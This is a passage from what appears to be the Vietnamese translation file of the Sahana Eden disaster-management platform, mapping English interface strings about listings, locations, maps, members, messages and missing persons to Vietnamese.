Types': 'Liệt kê / thêm loại hình khảo sát trước can thiệp', 'List / Add Impact Types': 'Liệt kê / thêm loại tác động', 'List Activities': 'Liệt kê hoạt động', 'List Activity Types': 'Liệt kê loại hoạt động', 'List Addresses': 'Liệt kê địa chỉ', 'List Affiliations': 'Liệt kê liên kết', 'List Aid Requests': 'Danh sách Yêu cầu cứu trợ', 'List All Catalogs & Add Items to Catalogs': 'Liệt kê danh mục & Thêm mục mặt hàng vào danh mục', 'List All Commitments': 'Liệt kê tất cả cam kết', 'List All Community Contacts': 'Liệt kê tất cả thông tin liên lạc của cộng đồng', 'List All Entries': 'Liệt kê tất cả hồ sơ', 'List All Essential Staff': 'Liệt kê tất cả cán bộ quan trọng', 'List All Item Categories': 'Liệt kê tất cả danh mục hàng hóa', 'List All Items': 'Liệt kê tất cả mặt hàng', 'List All Memberships': 'Danh sách tất cả các thành viên', 'List All Requested Items': 'Liệt kê tất cả mặt hàng được yêu cầu', 'List All Requested Skills': 'Liệt kê tất cả kỹ năng được yêu cầu', 'List All Requests': 'Liệt kê tất cả yêu cầu', 'List All Roles': 'Liệt kê tất cả 
vai trò', 'List All Security-related Staff': 'Liệt kê tất cả cán bộ liên quan đến vai trò bảo vệ', 'List All Users': 'Liệt kê tất cả người dùng', 'List All': 'Liệt kê tất cả', 'List Alternative Items': 'Liệt kê mặt hàng thay thế', 'List Annual Budgets': 'Liệt kê ngân sách năm', 'List Assessment Answers': 'Liệt kê câu trả lời trong biểu mẫu đánh giá', 'List Assessment Questions': 'Liệt kê câu hỏi trong biểu mẫu đánh giá', 'List Assessment Templates': 'Liệt kê biểu mẫu đánh giá', 'List Assessments': 'Liệt kê đánh giá', 'List Assets': 'Liệt kê tài sản', 'List Assigned Human Resources': 'Liệt kê nguồn nhân lực đã được phân công', 'List Beneficiaries': 'Liệt kê người hưởng lợi', 'List Beneficiary Types': 'Liệt kê loại người hưởng lợi', 'List Branch Organizations': 'Liệt kê tổ chức cơ sở', 'List Brands': 'Liệt kê nhãn hiệu', 'List Catalog Items': 'Liệt kê mặt hàng trong danh mục', 'List Catalogs': 'Liệt kê danh mục', 'List Certificates': 'Liệt kê chứng chỉ', 'List Certifications': 'Liệt kê bằng cấp', 'List Checklists': 'Danh sách Checklists', 'List Clusters': 'Liệt kê nhóm', 'List Commitment Items': 'Liệt kê mặt hàng cam kết', 'List Commitments': 'Liệt kê cam kết', 'List Committed People': 'Liệt kê người cam kết', 'List Communities': 'Liệt kê cộng đồng', 'List Community Contacts': 'Thông tin liên hệ cộng đồng', 'List Competency Ratings': 'Liệt kê xếp hạng năng lực', 'List Completed Assessment Forms': 'Liệt kê biểu mẫu đánh giá đã hoàn thiện', 'List Contact Information': 'Liệt kê thông tin liên lạc', 'List Contacts': 'Liệt kê liên lạc', 'List Course Certificates': 'Liệt kê Chứng chỉ khóa học', 'List Courses': 'Liệt kê khóa học', 'List Credentials': 'Liệt kê thư ủy nhiệm', 'List Current': 'Danh mục hiện hành', 'List Data in Theme Layer': 'Liệt kê dữ liệu trong lớp chủ đề ', 'List Demographic Data': 'Liệt kê số liệu dân số', 'List Demographic Sources': 'Liệt kê nguồn thông tin về dân số', 'List Demographics': 'Liệt kê dữ liệu nhân khẩu', 'List Departments': 'Liệt kê phòng/ban', 'List Disaster Assessments': 'Liệt kê báo cáo đánh giá thảm họa', 'List Distributions': 'Danh sách ủng hộ, quyên góp', 'List Documents': 'Liệt kê tài liệu', 'List Donors': 'Liệt kê nhà tài trợ', 'List Education Details': 'Liệt kê thông tin về trình độ học vấn', 'List Facilities': 'Liệt kê bộ phận', 'List Facility Types': 'Liệt kê loại hình bộ phận', 'List Feature Layers': 'Liệt kê lớp chức năng', 'List Frameworks': 'Liệt kê khung chương trình', 'List Groups': 'Liệt kê nhóm', 'List Hazards': 'Liệt kê hiểm họa', 'List Hospitals': 'Danh sách Bệnh viện', 'List Hours': 'Liệt kê thời gian hoạt động', 'List Identities': 'Liệt kê nhận dạng', 'List Images': 'Liệt kê hình ảnh', 'List Incident Reports': 'Liệt kê báo cáo sự cố', 'List Item Categories': 'Liệt kê danh mục hàng hóa', 'List Item Packs': 'Liệt kê gói hàng', 'List Items in Request': 'Liệt kê mặt hàng đang được yêu cầu', 'List Items in Stock': 'Liệt kê mặt hàng đang lưu kho', 'List Items': 'Liệt kê hàng hóa', 'List Job Roles': 'Liệt kê vai trò công việc', 'List Job Titles': 'Liệt kê chức danh công việc', 'List Jobs': 'Liệt kê công việc', 'List Kits': 'Liệt kê thùng hàng', 'List Layers in Profile': 'Liệt kê lớp trong hồ sơ tiểu sử', 'List Layers in Symbology': 'Liệt kê lớp trong biểu tượng', 'List Layers': 'Liệt kê lớp', 'List Location Hierarchies': 'Liệt kê thứ tự địa điểm', 'List Locations': 'Liệt kê địa điểm', 'List Log Entries': 'Liệt kê ghi chép nhật ký', 'List Logged Time': 'Liệt kê thời gian đã truy cập', 'List Mailing Lists': 'Liệt kê danh sách gửi thư', 'List 
Map Profiles': 'Liệt kê cấu hình bản đồ', 'List Markers': 'Liệt kê công cụ đánh dấu', 'List Members': 'Liệt kê hội viên', 'List Membership Types': 'Liệt kê loại hình nhóm hội viên', 'List Memberships': 'Liệt kê nhóm hội viên', 'List Messages': 'Liệt kê tin nhắn', 'List Metadata': 'Danh sách siêu dữ liệu', 'List Milestones': 'Liệt kê mốc thời gian quan trọng', 'List Missing Persons': 'Danh sách những người mất tích', 'List Office Types': 'Liệt kê loại hình văn phòng', 'List Offices': 'Liệt kê văn phòng', 'List Orders': 'Liệt kê lệnh', 'List Organization Domains': 'Liệt kê lĩnh vực hoạt động của tổ chức', 'List Organization Types': 'Liệt kê loại hình tổ chức', 'List Organizations': 'Liệt kê tổ chức', 'List Outputs': 'Liệt kê đầu ra', 'List Participants': 'Liệt kê người Tham dự', 'List Partner Organizations': 'Liệt kê tổ chức đối tác', 'List Persons': 'Liệt kê đối tượng', 'List Photos': 'Liệt kê ảnh', 'List Profiles configured for this Layer': 'Liệt kê tiểu sử được cấu hình cho lớp này', 'List Programs': 'Liệt kê chương trình', 'List Project Organizations': 'Liệt kê tổ chức dự án', 'List Projections': 'Liệt kê phép chiếu', 'List Projects': 'Liệt kê dự án', 'List Question Meta-Data': 'Liệt kê siêu dữ liệu câu hỏi', 'List Received/Incoming Shipments': 'Liệt kê lô hàng nhận được/đang đến', 'List Records': 'Liệt kê hồ sơ', 'List Red Cross & Red Crescent National Societies': 'Liệt kê Hội CTĐ & TLLĐ quốc gia', 'List Repositories': 'Liệt kê kho lưu trữ', 'List Request Items': 'Danh sách Hàng hóa yêu cầu', 'List Requested Skills': 'Liệt kê kỹ năng được yêu cầu', 'List Requests': 'Liệt kê yêu cầu', 'List Resources': 'Liệt kê nguồn lực', 'List Rivers': 'Danh sách sông', 'List Roles': 'Liệt kê vai trò', 'List Rooms': 'Liệt kê phòng', 'List Sectors': 'Liệt kê lĩnh vực', 'List Sent Shipments': 'Liệt kê lô hàng đã gửi đi', 'List Shelter Services': 'Danh sách dịch vụ cư trú', 'List Shipment Items': 'Liệt kê mặt hàng trong lô hàng', 'List Shipment/Way Bills': 'Danh sách Đơn hàng/Vận đơn', 'List Sites': 'Danh sách site', 'List Skill Equivalences': 'Liệt kê kỹ năng tương đương', 'List Skill Types': 'Liệt kê loại kỹ năng', 'List Skills': 'Liệt kê kỹ năng', 'List Staff & Volunteers': 'Liệt kê Cán bộ và Tình nguyện viên', 'List Staff Assignments': 'Liệt kê phân công cán bộ', 'List Staff Members': 'Liệt kê cán bộ', 'List Staff Types': 'Lên danh sách các bộ phận nhân viên', 'List Staff': 'Danh sách Nhân viên', 'List Statuses': 'Liệt kê tình trạng', 'List Stock Adjustments': 'Liệt kê điều chỉnh hàng lưu kho', 'List Stock in Warehouse': 'Liệt kê hàng lưu trong kho hàng', 'List Storage Location': 'Danh sách vị trí kho lưu trữ', 'List Subscriptions': 'Danh sách Đăng ký', 'List Suppliers': 'Liệt kê nhà cung cấp', 'List Support Requests': 'Liệt kê đề nghị hỗ trợ', 'List Survey Questions': 'Danh sách câu hỏi khảo sát', 'List Survey Series': 'Lên danh sách chuỗi khảo sát', 'List Symbologies for Layer': 'Liệt kê biểu tượng cho Lớp', 'List Symbologies': 'Liệt kê biểu tượng', 'List Tasks': 'Liệt kê nhiệm vụ', 'List Teams': 'Liệt kê Đội/Nhóm', 'List Template Sections': 'Liệt kê nội dung biểu mẫu', 'List Themes': 'Liệt kê chủ đề', 'List Training Events': 'Liệt kê khóa tập huấn', 'List Trainings': 'Liệt kê lớp tập huấn', 'List Units': 'Danh sách đơn vị', 'List Users': 'Liệt kê người sử dụng', 'List Vehicle Assignments': 'Liệt kê phân công phương tiện vận chuyển', 'List Volunteer Cluster Positions': 'Liệt kê vị trí nhóm tình nguyện viên', 'List Volunteer Cluster Types': 'Liệt kê loại hình nhóm tình nguyện viên', 'List Volunteer 
Clusters': 'Liệt kê nhóm tình nguyện viên', 'List Volunteer Roles': 'Liệt kê vai trò của tình nguyện viên', 'List Volunteers': 'Liệt kê tình nguyện viên', 'List Vulnerability Aggregated Indicators': 'Liệt kê chỉ số gộp đánh giá tình trạng dễ bị tổn thương', 'List Vulnerability Data': 'Liệt kê dữ liệu về tình trạng dễ bị tổn thương', 'List Vulnerability Indicator Sources': 'Liệt kê nguồn chỉ số đánh giá tình trạng dễ bị tổn thương', 'List Vulnerability Indicators': 'Liệt kê chỉ số đánh giá tình trạng dễ bị tổn thương', 'List Warehouses': 'Liệt kê kho hàng', 'List alerts': 'Liệt kê cảnh báo', 'List all Entries': 'Liệt kê tất cả hồ sơ', 'List all': 'Liệt kê tất cả', 'List of Missing Persons': 'Danh sách những người mất tích', 'List of Professional Experience': 'Danh sách kinh nghiệm nghề nghiệp', 'List of Requests': 'Danh sách yêu cầu', 'List of Roles': 'Danh sách vai trò', 'List of addresses': 'Danh sách các địa chỉ', 'List saved searches': 'Liệt kê tìm kiếm đã lưu', 'List templates': 'Liệt kê biểu mẫu', 'List unidentified': 'Liệt kê danh mục chưa tìm thấy', 'List': 'Liệt kê', 'List/Add': 'Liệt kê/ Thêm', 'Lists "who is doing what & where". Allows relief agencies to coordinate their activities': 'Danh sách "Ai làm gì, ở đâu". Cho phép các tổ chức cứu trợ điều phối hoạt động của mình', 'Live Help': 'Trợ giúp trực tuyến', 'Livelihood': 'Sinh kế', 'Livelihoods': 'Sinh kế', 'Load Cleaned Data into Database': 'Tải dữ liệu sạch vào cơ sở dữ liệu', 'Load Raw File into Grid': 'Tải file thô vào lưới', 'Load': 'Tải', 'Loaded By': 'Được tải lên bởi', 'Loading report details': 'Tải thông tin báo cáo', 'Loading': 'Đang tải', 'Local Name': 'Tên địa phương', 'Local Names': 'Tên địa phương', 'Location (Site)': 'Địa điểm (vùng)', 'Location 1': 'Địa điểm 1', 'Location 2': 'Địa điểm 2', 'Location 3': 'Địa điểm 3', 'Location Added': 'Địa điểm đã được thêm', 'Location Deleted': 'Địa điểm đã được xóa', 'Location Detail': 'Thông tin địa điểm', 'Location Details': 'Thông tin địa điểm', 'Location Group': 'Nhóm địa điểm', 'Location Hierarchies': 'Thứ tự địa điểm', 'Location Hierarchy Level 1 Name': 'Tên thứ tự địa điểm cấp 1', 'Location Hierarchy Level 2 Name': 'Tên thứ tự địa điểm cấp 2', 'Location Hierarchy Level 3 Name': 'Tên thứ tự địa điểm cấp 3', 'Location Hierarchy Level 4 Name': 'Tên thứ tự địa điểm cấp 4', 'Location Hierarchy Level 5 Name': 'Tên thứ tự địa điểm cấp 5', 'Location Hierarchy added': 'Thứ tự địa điểm đã được thêm', 'Location Hierarchy deleted': 'Thứ tự địa điểm đã được xóa', 'Location Hierarchy updated': 'Thứ tự địa điểm đã được cập nhật', 'Location Hierarchy': 'Thứ tự địa điểm', 'Location Updated': 'Địa điểm đã được cập nhật', 'Location added': 'Địa điểm đã được thêm', 'Location deleted': 'Địa điểm đã được xóa', 'Location is Required!': 'Địa điểm được yêu cầu!', 'Location needs to have WKT!': 'Địa điểm cần có WKT!', 'Location updated': 'Địa điểm đã được cập nhật', 'Location': 'Địa điểm', 'Locations of this level need to have a parent of level': 'Địa điểm ở cấp độ này cần có các cấp độ cha', 'Locations': 'Địa điểm', 'Log Entry Deleted': 'Ghi chép nhật ký đã được xóa', 'Log Entry Details': 'Thông tin về ghi chép nhật ký', 'Log Entry': 'Ghi chép nhật ký', 'Log New Time': 'Thời gian truy cập Mới', 'Log Time Spent': 'Thời gian đã Truy cập', 'Log entry added': 'Ghi chép nhật ký đã được thêm', 'Log entry deleted': 'Ghi chép nhật ký đã được xóa', 'Log entry updated': 'Ghi chép nhật ký đã được cập nhật', 'Log': 'Nhật ký', 'Logged Time Details': 'Thông tin về thời gian đã truy cập', 'Logged 
Time': 'Thời gian đã truy cập', 'Login with Facebook': 'Đăng nhập với Facebook', 'Login with Google': 'Đăng nhập với Google', 'Login': 'Đăng nhập', 'Logistics & Warehouse': 'Hậu cần & Nhà kho', 'Logo of the organization. This should be a png or jpeg file and it should be no larger than 400x400': 'Biểu trưng của một tổ chức phải là tệp png hay jpeg và không lớn hơn 400x400', 'Logo': 'Biểu tượng', 'Logout': 'Thoát', 'Long Name': 'Tên đầy đủ', 'Long Text': 'Đoạn văn bản dài', 'Long-term': 'Dài hạn', 'Longitude is Invalid!': 'Kinh độ không hợp lệ', 'Longitude is West - East (sideways). Longitude is zero on the prime meridian (Greenwich Mean Time) and is positive to the east, across Europe and Asia. Longitude is negative to the west, across the Atlantic and the Americas.': 'Kinh độ là Tây - Đông (chiều ngang). Kinh độ bằng không tại kinh tuyến gốc (Giờ Greenwich) và có giá trị dương về phía đông, qua châu Âu và châu Á. Kinh độ có giá trị âm về phía tây, qua Đại Tây Dương và châu Mỹ.', 'Longitude is West - East (sideways).': 'Kinh độ Tây - Đông (đường ngang)', 'Longitude is West-East (sideways).': 'Kinh độ Tây - Đông (đường ngang)', 'Longitude is zero on the prime meridian (Greenwich Mean Time) and is positive to the east, across Europe and Asia. Longitude is negative to the west, across the Atlantic and the Americas.': 'Kinh độ là 0 tại đường kinh tuyến đầu tiên (Thời gian vùng Greenwich) và có giá trị dương sang phía đông, qua Châu Âu và Châu Á. Kinh tuyến có giá trị âm sang phía tây, từ Đại Tây Dương qua Châu Mỹ.', 'Longitude is zero on the prime meridian (through Greenwich, United Kingdom) and is positive to the east, across Europe and Asia. Longitude is negative to the west, across the Atlantic and the Americas.': 'Kinh độ là 0 tại đường kinh tuyến đầu tiên (xuyên qua Greenwich, Anh) và có giá trị dương sang phía đông, qua châu Âu và Châu Á. 
Kinh tuyến có giá trị âm sang phía tây qua Đại Tây Dương và Châu Mỹ.', 'Longitude must be between -180 and 180.': 'Kinh độ phải nằm giữa -180 và 180', 'Longitude of Map Center': 'Kinh độ trung tâm bản đồ của vùng quan tâm', 'Longitude of far eastern end of the region of interest.': 'Kinh độ phía đông điểm cuối của vùng quan tâm', 'Longitude of far western end of the region of interest.': 'Kinh độ phía tây điểm cuối của vùng quan tâm', 'Longitude should be between': 'Kinh độ phải từ', 'Longitude': 'Kinh độ', 'Looting': 'Nạn cướp bóc', 'Lost Password': 'Mất mật khẩu', 'Lost': 'Mất', 'Low': 'Thấp', 'MEDIAN': 'ĐIỂM GIỮA', 'MGRS Layer': 'Lớp MGRS', 'MODERATE': 'TRUNG BÌNH', 'MY REPORTS': 'BÁO CÁO CỦA TÔI', 'Magnetic Storm': 'Bão từ trường', 'Mailing List Details': 'Thông tin danh sách gửi thư', 'Mailing List Name': 'Tên danh sách gửi thư', 'Mailing Lists': 'Danh sách gửi thư', 'Mailing list added': 'Danh sách gửi thư đã được thêm', 'Mailing list deleted': 'Danh sách gửi thư đã được xóa', 'Mailing list updated': 'Danh sách gửi thư đã được cập nhật', 'Mailing list': 'Danh sách gửi thư', 'Main Duties': 'Nhiệm vụ chính', 'Mainstreaming DRR': 'GTRRTH Chính thống', 'Major Damage': 'Thiệt hại lớn', 'Major outward damage': 'Hư hỏng nặng bên ngoài', 'Major': 'Chuyên ngành', 'Make Commitment': 'Làm một cam kết', 'Make New Commitment': 'Làm một cam kết Mới', 'Make Request': 'Đặt yêu cầu', 'Make a Request for Aid': 'Tạo yêu cầu cứu trợ', 'Make a Request': 'Tạo yêu cầu', 'Male': 'Nam', 'Manage Layers in Catalog': 'Quản lý Lớp trong danh mục', 'Manage Returns': 'Quản lý hàng trả lại', 'Manage Sub-Category': 'Quản lý Tiêu chí phụ', 'Manage Teams Data': 'Quản lý dữ liệu đội TNV', 'Manage Users & Roles': 'Quản lý Người sử dụng & Vai trò', 'Manage Volunteer Data': 'Quản lý dữ liệu TNV', 'Manage Your Facilities': 'Quản lý bộ phận của bạn', 'Manage office inventories and assets.': 'Quản lý tài sản và thiết bị văn phòng', 'Manage volunteers by capturing their skills, availability and allocation': 'Quản lý tình nguyện viên bằng việc nắm bắt những kĩ năng, khả năng và khu vực hoạt động của họ', 'Managing material and human resources together to better prepare for future hazards and vulnerabilities.': 'Quản lý nguồn lực để chuẩn bị tốt hơn cho hiểm họa trong tương lai và tình trạng dễ bị tổn thương.', 'Managing, Storing and Distributing Relief Items.': 'Quản lý, Lưu trữ và Quyên góp hàng cứu trợ', 'Mandatory. In GeoServer, this is the Layer Name. Within the WFS getCapabilities, this is the FeatureType Name part after the colon(:).': 'Bắt buộc. Trong GeoServer, đây là tên Lớp. Trong WFS getCapabilities, đây là phần Tên FeatureType sau dấu hai chấm (:).', 'Mandatory. The URL to access the service.': 'Trường bắt buộc. 
URL để truy cập dịch vụ', 'Manual Synchronization': 'Đồng bộ hóa thủ công', 'Manual synchronization completed.': 'Đồng bộ hóa thủ công đã hoàn tất', 'Manual synchronization scheduled - refresh page to update status.': 'Đồng bộ hóa thủ công đã được đặt lịch - làm mới trang để cập nhật tình trạng', 'Manual synchronization started in the background.': 'Đồng bộ hóa thủ công đã bắt đầu chạy nền', 'Map Center Latitude': 'Vĩ độ trung tâm bản đồ', 'Map Center Longitude': 'Kinh độ trung tâm bản đồ', 'Map Profile added': 'Cấu hình bản đồ đã được thêm', 'Map Profile deleted': 'Cấu hình bản đồ đã được xóa', 'Map Profile updated': 'Cấu hình bản đồ đã được cập nhật', 'Map Profile': 'Cấu hình bản đồ', 'Map Profiles': 'Cấu hình bản đồ', 'Map Height': 'Chiều cao bản đồ', 'Map Service Catalog': 'Catalogue bản đồ dịch vụ', 'Map Settings': 'Cài đặt bản đồ', 'Map Viewing Client': 'Người đang xem bản đồ', 'Map Width': 'Độ rộng bản đồ', 'Map Zoom': 'Phóng to thu nhỏ Bản đồ', 'Map from Sahana Eden': 'Bản đồ từ Sahana Eden', 'Map not available: No Projection configured': 'Bản đồ không có: Chưa có phép chiếu nào được cấu hình', 'Map not available: Projection %(projection)s not supported - please add definition to %(path)s': 'Bản đồ không có: Phép chiếu %(projection)s không được hỗ trợ - xin thêm định nghĩa vào %(path)s', 'Map of Communties': 'Bản đồ cộng đồng', 'Map of Hospitals': 'Bản đồ bệnh viện', 'Map of Incident Reports': 'Bản đồ báo cáo sự cố', 'Map of Offices': 'Bản đồ văn phòng', 'Map of Projects': 'Bản đồ dự án', 'Map of Warehouses': 'Bản đồ kho hàng', 'Map': 'Bản đồ', 'Marine Security': 'An ninh hàng hải', 'Marital Status': 'Tình trạng hôn nhân', 'Marker Details': 'Thông tin công cụ đánh dấu', 'Marker Levels': 'Cấp độ công cụ đánh dấu', 'Marker added': 'Công cụ đánh dấu đã được thêm', 'Marker deleted': 'Công cụ đánh dấu đã được xóa', 'Marker updated': 'Công cụ đánh dấu đã được cập nhật', 'Marker': 'Công cụ đánh dấu', 'Markers': 'Công cụ đánh dấu', 'Married': 'Đã kết hôn', 'Master Message Log to process incoming reports & requests': 'Kiểm soát log tin nhắn để xử lý báo cáo và yêu cầu gửi đến', 'Master Message Log': 'Nhật ký tin nhắn chính', 'Master': 'Chủ chốt', 'Master Degree or Higher': 'Trên đại học', 'Match Requests': 'Phù hợp với yêu cầu', 'Match?': 'Phù hợp?', 'Matching Catalog Items': 'Mặt hàng trong danh mục phù hợp', 'Matching Items': 'Mặt hàng phù hợp', 'Matching Records': 'Hồ sơ phù hợp', 'Maternal, Newborn and Child Health': 'CSSK Bà mẹ, trẻ sơ sinh và trẻ em', 'Matrix of Choices (Only one answer)': 'Ma trận lựa chọn (chỉ chọn một câu trả lời)', 'Maximum Location Latitude': 'Vĩ độ tối đa của địa điểm', 'Maximum Location Longitude': 'Kinh độ tối đa của địa điểm', 'Maximum Weight': 'Khối lượng tối đa', 'Maximum must be greater than minimum': 'Giá trị tối đa phải lớn hơn giá trị tối thiểu', 'Maximum': 'Tối đa', 'Mean': 'Trung bình', 'Measure Area: Click the points around the polygon & end with a double-click': 'Đo diện tích: Bấm chuột vào điểm của khu vực cần đo & kết thúc bằng nháy đúp chuột', 'Measure Length: Click the points along the path & end with a double-click': 'Đo Chiều dài: Bấm chuột vào điểm dọc đường đi & kết thúc bằng nháy đúp chuột', 'Media': 'Truyền thông', 'Median Absolute Deviation': 'Độ lệch tuyệt đối trung bình', 'Median': 'Điểm giữa', 'Medical Conditions': 'Tình trạng sức khỏe', 'Medical Services': 'Dịch vụ y tế', 'Medium': 'Trung bình', 'Member Base Development': 'Phát triển cơ sở hội viên', 'Member Details': 'Thông tin về hội viên', 'Member ID': 'Tên truy nhập của 
hội viên', 'Member added to Group': 'Thành viên nhóm đã được thêm', 'Member added to Team': 'Thành viên Đội/Nhóm đã thêm', 'Member added': 'Hội viên đã được thêm', 'Member deleted': 'Hội viên đã được xóa', 'Member removed from Group': 'Thành viên đã bị xóa khỏi Nhóm', 'Member updated': 'Hội viên đã được cập nhật', 'Member': 'Hội viên', 'Members': 'Hội viên', 'Membership Details': 'Thông tin về nhóm hội viên', 'Membership Fee': 'Phí hội viên', 'Membership Paid': 'Hội viên đã đóng phí', 'Membership Type Details': 'Thông tin về loại hình nhóm hội viên', 'Membership Type added': 'Loại hình nhóm hội viên đã được thêm', 'Membership Type deleted': 'Loại hình nhóm hội viên đã được xóa', 'Membership Type updated': 'Loại hình nhóm hội viên đã được cập nhật', 'Membership Types': 'Loại hình nhóm hội viên', 'Membership updated': 'Nhóm hội viên đã được cập nhật', 'Membership': 'Nhóm hội viên', 'Memberships': 'Nhóm hội viên', 'Message Details': 'Chi tiết tin nhắn', 'Message Parser settings updated': 'Cài đặt cú pháp tin nhắn đã được cập nhật', 'Message Source': 'Nguồn tin nhắn', 'Message Variable': 'Biến tin nhắn', 'Message added': 'Tin nhắn đã được thêm', 'Message deleted': 'Tin nhắn đã được xóa', 'Message updated': 'Tin nhắn đã được cập nhật', 'Message variable': 'Biến tin nhắn', 'Message': 'Tin nhắn', 'Messages': 'Tin nhắn', 'Messaging': 'Soạn tin nhắn', 'Metadata Details': 'Chi tiết siêu dữ liệu', 'Metadata added': 'Đã thêm siêu dữ liệu', 'Metadata': 'Siêu dữ liệu', 'Meteorite': 'Thiên thạch', 'Middle Name': 'Tên đệm', 'Migrants or ethnic minorities': 'Dân di cư hoặc dân tộc thiểu số', 'Milestone Added': 'Mốc thời gian quan trọng đã được thêm', 'Milestone Deleted': 'Mốc thời gian quan trọng đã được xóa', 'Milestone Details': 'Thông tin về mốc thời gian quan trọng', 'Milestone Updated': 'Mốc thời gian quan trọng đã được cập nhật', 'Milestone': 'Mốc thời gian quan trọng', 'Milestones': 'Mốc thời gian quan trọng', 'Minimum Location Latitude': 'Vĩ độ tối thiểu của địa điểm', 'Minimum Location Longitude': 'Kinh độ tối thiểu của địa điểm', 'Minimum': 'Tối thiểu', 'Minor Damage': 'Thiệt hại nhỏ', 'Minute': 'Phút', 'Minutes must be a number.': 'Giá trị của phút phải bằng chữ số', 'Minutes must be less than 60.': 'Giá trị của phút phải ít hơn 60', 'Missing Person Details': 'Chi tiết về người mất tích', 'Missing Person Reports': 'Báo cáo số người mất tích', 'Missing Person': 'Người mất tích', 'Missing Persons Report': 'Báo cáo số người mất tích', 'Missing Persons': 'Người mất tích', 'Missing Senior Citizen': 'Người già bị mất tích', 'Missing Vulnerable Person': 'Người dễ bị tổn thương mất tích', 'Missing': 'Mất tích', 'Mobile Phone Number': 'Số di động', 'Mobile Phone': 'Số di động', 'Mobile': 'Di động', 'Mode': 'Phương thức', 'Model/Type': 'Đời máy/ Loại', 'Modem settings updated': 'Cài đặt mô đem đã được cập nhật', 'Modem': 'Mô đem', 'Moderator': 'Điều tiết viên', 'Modify Feature: Select the feature you wish to deform & then Drag one of the dots to deform the feature in your chosen manner': 'Sửa đổi tính năng: Lựa chọn tính năng bạn muốn để thay đổi và sau đó kéo một trong các điểm để thay đổi tính năng theo cách bạn chọn', 'Modify Information on groups and individuals': 'Thay đổi thông tin của nhóm và cá nhân', 'Module Administration': 'Quản trị Mô-đun', 'Monday': 'Thứ Hai', 'Monetization Details': 'Thông tin lưu hành tiền tệ', 'Monetization Report': 'Báo cáo lưu hành tiền tệ', 'Monetization': 'Lưu hành tiền tệ', 'Monitoring and Evaluation': 'Giám sát và Đánh giá', 'Month': 'Tháng', 'Monthly': 'Hàng tháng', 
'Months': 'Tháng', 'More Options': 'Mở rộng chức năng', 'Morgue': 'Nhà xác', 'Morgues': 'Nhà xác', 'Moustache': 'Ria mép', 'Move Feature: Drag feature to desired location': 'Di chuyển tính năng: Kéo tính năng tới vị trí mong muốn', 'Multi-Option': 'Đa lựa chọn', 'Multiple Matches': 'Nhiều kết quả phù hợp', 'Multiple': 'Nhiều', 'Muslim': 'Tín đồ Hồi giáo', 'Must a location have a parent location?': 'Một địa điểm có bắt buộc phải có địa điểm cấp trên không?', 'My Logged Hours': 'Thời gian truy cập của tôi', 'My Open Tasks': 'Nhiệm vụ của tôi', 'My Profile': 'Hồ sơ của tôi', 'My Tasks': 'Nhiệm vụ của tôi', 'My reports': 'Báo cáo của tôi', 'N/A': 'Không xác định', 'NDRT (National Disaster Response Teams)': 'Đội ứng phó thảm họa cấp TW', 'NO': 'KHÔNG', 'NUMBER_GROUPING': 'SỐ_THEO NHÓM', 'NZSEE Level 1': 'Mức 1 NZSEE', 'NZSEE Level 2': 'Mức 2 NZSEE', 'Name and/or ID': 'Tên và/hoặc tên truy nhập', 'Name field is required!': 'Bắt buộc phải điền Tên!', 'Name of Award': 'Tên phần thưởng', 'Name of Driver': 'Tên tài xế', 'Name of Father': 'Tên cha', 'Name of Institute': 'Trường Đại học/ Học viện', 'Name of Mother': 'Tên mẹ', 'Name of Storage Bin Type.': 'Tên loại Bin lưu trữ', 'Name of the person in local language and script (optional).': 'Tên theo ngôn ngữ và chữ viết địa phương (tùy chọn)', 'Name of the repository (for you own reference)': 'Tên của kho (để bạn tham khảo)', 'Name': 'Tên', 'National ID Card': 'Chứng minh nhân dân', 'National NGO': 'Các tổ chức phi chính phủ', 'National Societies': 'Hội Quốc gia', 'National Society / Branch': 'Trung ương/ Tỉnh, thành Hội', 'National Society Details': 'Thông tin về Hội Quốc gia', 'National Society added': 'Hội Quốc gia đã được thêm', 'National Society deleted': 'Hội Quốc gia đã được xóa', 'National Society updated': 'Hội Quốc gia đã được cập nhật', 'National Society': 'Hội QG', 'Nationality of the person.': 'Quốc tịch', 'Nationality': 'Quốc tịch', 'Nautical Accident': 'Tai nạn trên biển', 'Nautical Hijacking': 'Cướp trên biển', 'Need to configure Twitter Authentication': 'Cần thiết lập cấu hình Xác thực Twitter', 'Need to select 2 Locations': 'Cần chọn 2 vị trí', 'Need to specify a location to search for.': 'Cần xác định cụ thể một địa điểm để tìm kiếm', 'Need to specify a role!': 'Yêu cầu xác định vai trò', 'Needs Maintenance': 'Cần bảo dưỡng', 'Never': 'Không bao giờ', 'New Annual Budget created': 'Ngân sách hàng năm mới đã được tạo', 'New Certificate': 'Chứng chỉ mới', 'New Checklist': 'Checklist mới', 'New Entry in Asset Log': 'Ghi chép mới trong nhật ký tài sản', 'New Entry': 'Hồ sơ mới', 'New Job Title': 'Chức vụ công việc mới', 'New Organization': 'Tổ chức mới', 'Add Output': 'Thêm kết quả đầu ra', 'New Post': 'Bài đăng mới', 'New Record': 'Hồ sơ mới', 'New Request': 'Yêu cầu mới', 'New Role': 'Vai trò mới', 'New Stock Adjustment': 'Điều chỉnh mới về kho hàng', 'New Support Request': 'Yêu cầu hỗ trợ mới', 'New Team': 'Đội/Nhóm mới', 'New Theme': 'Chủ đề mới', 'New Training Course': 'Khóa tập huấn mới', 'New Training Event': 'Khóa tập huấn mới', 'New User': 'Người sử dụng mới', 'New': 'Thêm mới', 'News': 'Tin tức', 'Next View': 'Hiển thị tiếp', 'Next run': 'Lần chạy tiếp theo', 'Next': 'Trang sau', 'No Activities Found': 'Không tìm thấy hoạt động nào', 'No Activity Types Found': 'Không tìm thấy loại hình hoạt động nào', 'No Addresses currently registered': 'Hiện tại chưa đăng ký Địa chỉ', 'No Affiliations defined': 'Không xác định được liên kết nào', 'No Aid Requests have been made yet': 'Chưa có yêu cầu cứu trợ nào được tạo', 'No 
